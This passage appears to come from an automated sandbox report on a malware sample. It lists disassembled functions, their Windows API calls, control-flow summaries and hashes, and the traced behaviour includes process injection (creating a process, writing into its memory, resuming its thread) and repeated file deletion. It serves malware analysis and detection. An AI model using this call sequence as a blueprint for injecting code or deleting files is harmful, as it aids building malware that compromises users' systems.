                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.1892604094.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_21f0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                          • String ID: $1;$@$C[$R$d:$wJ$y7$v
                                                                                                                                                                                          • API String ID: 544645111-3459585926
                                                                                                                                                                                          • Opcode ID: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
                                                                                                                                                                                          • Instruction ID: 28e5be904831581971660279813b2c29e89ec9c6c7ba3c7a11617b115dd6d7d6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F3277B8E012688BDB64CF68C890BDDBBB1BF49304F1481DAD848A7341D775AE85CF95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 001C093E Relevance: 18.1, APIs: 12, Instructions: 134sleepthreadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 001C0959
                                                                                                                                                                                          • RtlExitUserThread.NTDLL(00000000), ref: 001C0961
                                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0981
                                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 001C0999
                                                                                                                                                                                            • Part of subcall function 001C09D9: CreateProcessA.KERNEL32(00000000,001C09D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 001C09E0
                                                                                                                                                                                            • Part of subcall function 001C09D9: GetThreadContext.KERNEL32(?,00000000), ref: 001C0A08
                                                                                                                                                                                            • Part of subcall function 001C09D9: VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A33
                                                                                                                                                                                            • Part of subcall function 001C09D9: DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C5810,00000000,00000000,00000002), ref: 001C0A78
                                                                                                                                                                                            • Part of subcall function 001C09D9: WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AA6
                                                                                                                                                                                            • Part of subcall function 001C09D9: ResumeThread.KERNEL32(?), ref: 001C0AB6
                                                                                                                                                                                            • Part of subcall function 001C09D9: Sleep.KERNEL32(000003E8), ref: 001C0AC6
                                                                                                                                                                                            • Part of subcall function 001C09D9: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0ADD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.1891541634.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_1c0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1099281029-0
                                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction ID: 02247e30dbf509db19e564959b2d0d53da4b464b58ceeb9d9e50b48634e6cc8b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction Fuzzy Hash: E7517031644354AFEF239F20CC85F9A77B8AF14B44F040199BA49FE0D6DBB0DA94CA65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 001C3F0D Relevance: 6.0, APIs: 4, Instructions: 26sleepCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F2D
                                                                                                                                                                                          • Sleep.KERNELBASE(000003E8,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F4B
                                                                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 001C3F5B
                                                                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 001C3F6B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.1891541634.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_1c0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Sleep$HandleModule
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3646095425-0
                                                                                                                                                                                          • Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                                          • Instruction ID: 634a74a46434a642e0226302b98b7da89e65e1ed753664d014aab6768df5a327
                                                                                                                                                                                          • Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                                          • Instruction Fuzzy Hash: EFF05E60988244A6EF413BB0884AF4D36B45F31705F04889CBA59E90D2CF30C6508E72
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 001C1345 Relevance: 4.6, APIs: 3, Instructions: 61memoryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 53 1c1345-1c1352 54 1c1358-1c135e 53->54 55 1c13eb-1c13ec 53->55 54->55 56 1c1364-1c137a VirtualProtect 54->56 56->55 57 1c137c-1c138f VirtualAlloc 56->57 57->57 58 1c1391-1c1398 57->58 59 1c139b-1c13ab call 1c0e7c 58->59 62 1c13ad-1c13e5 VirtualProtect 59->62 62->55
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000020,00000040,?), ref: 001C1372
                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040), ref: 001C1387
                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000020,?,?), ref: 001C13E5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.1891541634.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_1c0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Virtual$Protect$Alloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2541858876-0
                                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction ID: 24bdabae7abb68ff9a17f5ee70b33f63d9b304115b88680595e81b57cc4b6d8c
                                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction Fuzzy Hash: C921AE31944256AFDB11DE78C844B5DBBB5AF05310F054219F955BB5D5D730E800CB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 023A3409 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 511 23a3409-23a3462 GetVolumeInformationA call 23a3634
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetVolumeInformationA.KERNELBASE(023A3405,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 023A3409
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.1892758259.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_23a0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InformationVolume
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2039140958-0
                                                                                                                                                                                          • Opcode ID: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
                                                                                                                                                                                          • Instruction ID: fc295450b17f6267912b9cf3b3424786af93421a84b2be300944b474e70b7cc8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9EF0F875A00154DBEF12EF24C485A9A7BF8AF84344F4508D8AA4DBF206CA30A599CFA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 001C292D Relevance: 13.7, APIs: 9, Instructions: 169filestringsleepCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 554 1c292d-1c2943 call 1c3653 LoadLibraryA call 1c0c9c 558 1c2948-1c295f 554->558 560 1c2961-1c2977 VirtualAlloc 558->560 560->560 561 1c2979-1c299f call 1c25e8 call 1c29a6 560->561 566 1c2a07-1c2a1a call 1c3653 lstrcat 561->566 567 1c29a1-1c2a06 call 1c3653 lstrcat call 1c25e8 call 1c29dd call 1c3653 lstrcat call 1c2501 call 1c2a14 561->567 574 1c2a20-1c2a43 call 1c2b4d call 1c34f7 566->574 567->566 583 1c2a48-1c2a4f 574->583 583->574 585 1c2a51-1c2a6d call 1c343f call 1c2683 583->585 594 1c2a6f 585->594 595 1c2a9a-1c2ab1 call 1c2683 585->595 594->595 597 1c2a71-1c2a86 call 1c26f9 594->597 600 1c2ade-1c2af5 call 1c2683 595->600 601 1c2ab3 595->601 597->595 605 1c2a88 597->605 610 1c2af8-1c2b11 call 1c2e97 600->610 611 1c2af7 600->611 601->600 603 1c2ab5-1c2aca call 1c26f9 601->603 603->600 612 1c2acc 603->612 605->595 606 1c2a8a-1c2a94 DeleteFileA 605->606 606->595 616 1c2b34-1c2b48 Sleep 610->616 617 1c2b13-1c2b1c call 1c3057 610->617 611->610 612->600 615 1c2ace-1c2ad8 DeleteFileA 612->615 615->600 616->583 617->616 620 1c2b1e-1c2b2e DeleteFileA 617->620 620->616
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(001C2925,00000008,?,00000000,001C2811,00000000), ref: 001C2932
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 001C296F
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C299D), ref: 001C29AC
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.1891541634.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_1c0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFilelstrcat$AllocLibraryLoadSleepVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 675344582-0
                                                                                                                                                                                          • Opcode ID: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                                          • Instruction ID: 5e20f8d1fd77fe1a3bbaf27d3d0f84e3a94bc46b39ba8ee9e7a75b819cd3b3af
                                                                                                                                                                                          • Opcode Fuzzy Hash: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 55513471500264AFDB227B608D49FAB77BCEF60705F0444AEFA45EB056DB74DA80CEA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 023A2951 Relevance: 13.7, APIs: 9, Instructions: 169filestringsleepCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(023A2949,00000008,?,00000000,023A2835,00000000), ref: 023A2956
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 023A2993
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,023A29C1), ref: 023A29D0
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,023A29F8), ref: 023A2A07
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,023A2A2F), ref: 023A2A3E
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 023A2AB8
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 023A2AFC
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 023A2B52
                                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 023A2B66
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.1892758259.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_23a0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFilelstrcat$AllocLibraryLoadSleepVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 675344582-0
                                                                                                                                                                                          • Opcode ID: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                                          • Instruction ID: c2c53b7add89f5405ac2cbe349f6c6d84317309b57a9332ff12d303cee29235a
                                                                                                                                                                                          • Opcode Fuzzy Hash: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                                          • Instruction Fuzzy Hash: F2516371504214AEEB22AF708C58FAB77BDFF41705F4444B5AE86EA051EE309680CEA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 001C09D9 Relevance: 12.1, APIs: 8, Instructions: 76threadsleepprocessCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 689 1c09d9-1c09e8 call 1c3653 CreateProcessA 692 1c0aec call 1c0af3 689->692 693 1c09ee-1c0a10 GetThreadContext 689->693 697 1c0af1-1c0af2 692->697 693->692 694 1c0a16-1c0a3b VirtualProtectEx 693->694 694->692 696 1c0a3c-1c0a80 DuplicateHandle 694->696 696->692 699 1c0a82-1c0aae WriteProcessMemory 696->699 699->692 700 1c0ab0-1c0abc ResumeThread 699->700 701 1c0ac1-1c0ae5 Sleep OpenMutexA 700->701 701->697 702 1c0ae7-1c0aea 701->702 702->692 702->701
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,001C09D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 001C09E0
                                                                                                                                                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 001C0A08
                                                                                                                                                                                          • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A33
                                                                                                                                                                                          • DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C5810,00000000,00000000,00000002), ref: 001C0A78
                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AA6
                                                                                                                                                                                          • ResumeThread.KERNEL32(?), ref: 001C0AB6
                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 001C0AC6
                                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0ADD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.1891541634.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_1c0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 617592159-0
                                                                                                                                                                                          • Opcode ID: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                                          • Instruction ID: d08d0b8b2051c34f5721e4dda066ff8a6639c36971b334a2f4be7756b07d5326
                                                                                                                                                                                          • Opcode Fuzzy Hash: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                                          • Instruction Fuzzy Hash: F0312F31640215AFEF239F14CC85FAA77B8AF14744F080199AA49FE0E5DBB0DA90CE54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 023A09FD Relevance: 12.1, APIs: 8, Instructions: 76threadsleepprocessCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 703 23a09fd-23a0a0c call 23a3677 CreateProcessA 706 23a0a12-23a0a34 GetThreadContext 703->706 707 23a0b10 703->707 706->707 710 23a0a3a-23a0a5f VirtualProtectEx 706->710 708 23a0b15-23a0b16 707->708 709 23a0b10 call 23a0b17 707->709 709->708 710->707 711 23a0a65-23a0aa4 DuplicateHandle 710->711 711->707 712 23a0aa6-23a0ad2 WriteProcessMemory 711->712 712->707 713 23a0ad4-23a0ae0 ResumeThread 712->713 714 23a0ae5-23a0b09 Sleep OpenMutexA 713->714 714->708 715 23a0b0b-23a0b0e 714->715 715->707 715->714
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,023A09F6,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 023A0A04
                                                                                                                                                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 023A0A2C
                                                                                                                                                                                          • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 023A0A57
                                                                                                                                                                                          • DuplicateHandle.KERNEL32(000000FF,000000FF,?,023A5834,00000000,00000000,00000002), ref: 023A0A9C
                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 023A0ACA
                                                                                                                                                                                          • ResumeThread.KERNEL32(?), ref: 023A0ADA
                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 023A0AEA
                                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 023A0B01
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.1892758259.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_23a0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 617592159-0
                                                                                                                                                                                          • Opcode ID: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                                          • Instruction ID: 7ea44353f8bae36f642a803b331dacfbaa5631f79c4d5de9db08e8c321006128
                                                                                                                                                                                          • Opcode Fuzzy Hash: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                                          • Instruction Fuzzy Hash: BF3150316402189FEF269F20CC95BA977B9FF04748F0805E4AA49FE0E5DBB0D690CE64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 001C29A6 Relevance: 10.6, APIs: 7, Instructions: 130sleepfilestringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 716 1c29a6-1c2a1a call 1c3653 lstrcat call 1c25e8 call 1c29dd call 1c3653 lstrcat call 1c2501 call 1c2a14 call 1c3653 lstrcat 733 1c2a20-1c2a43 call 1c2b4d call 1c34f7 716->733 737 1c2a48-1c2a4f 733->737 737->733 738 1c2a51-1c2a6d call 1c343f call 1c2683 737->738 743 1c2a6f 738->743 744 1c2a9a-1c2ab1 call 1c2683 738->744 743->744 746 1c2a71-1c2a86 call 1c26f9 743->746 749 1c2ade-1c2af5 call 1c2683 744->749 750 1c2ab3 744->750 746->744 754 1c2a88 746->754 759 1c2af8-1c2b11 call 1c2e97 749->759 760 1c2af7 749->760 750->749 752 1c2ab5-1c2aca call 1c26f9 750->752 752->749 761 1c2acc 752->761 754->744 755 1c2a8a-1c2a94 DeleteFileA 754->755 755->744 765 1c2b34-1c2b48 Sleep 759->765 766 1c2b13-1c2b1c call 1c3057 759->766 760->759 761->749 764 1c2ace-1c2ad8 DeleteFileA 761->764 764->749 765->737 766->765 769 1c2b1e-1c2b2e DeleteFileA 766->769 769->765
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C299D), ref: 001C29AC
                                                                                                                                                                                            • Part of subcall function 001C29DD: lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
                                                                                                                                                                                            • Part of subcall function 001C29DD: lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                                            • Part of subcall function 001C29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                                            • Part of subcall function 001C29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.1891541634.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_1c0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFilelstrcat$Sleep
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 588723932-0
                                                                                                                                                                                          • Opcode ID: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                                          • Instruction ID: c636e14730fe7c8789ea0b8b2e66408bc148dc9e268f550b67392472ade30f33
                                                                                                                                                                                          • Opcode Fuzzy Hash: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9441F1715002289FDB22BB618D49FAB77BCEF60705F0444AAEA45E7055DB74DA80CEA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 023A29CA Relevance: 10.6, APIs: 7, Instructions: 130sleepfilestringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,023A29C1), ref: 023A29D0
                                                                                                                                                                                            • Part of subcall function 023A2A01: lstrcat.KERNEL32(00000000,023A29F8), ref: 023A2A07
                                                                                                                                                                                            • Part of subcall function 023A2A01: lstrcat.KERNEL32(00000000,023A2A2F), ref: 023A2A3E
                                                                                                                                                                                            • Part of subcall function 023A2A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 023A2AB8
                                                                                                                                                                                            • Part of subcall function 023A2A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 023A2AFC
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 023A2B52
                                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 023A2B66
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.1892758259.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_23a0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFilelstrcat$Sleep
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 588723932-0
                                                                                                                                                                                          • Opcode ID: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                                          • Instruction ID: 214cb71808e54b0b099ed5c916c80f383bf560b138c81c03cc5c00997d2c0982
                                                                                                                                                                                          • Opcode Fuzzy Hash: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B4131719052589EDB32AF708D58EAF77BDEF40704F4044B5AE86EA051EE359A80CEA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 001C29DD Relevance: 9.1, APIs: 6, Instructions: 112stringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
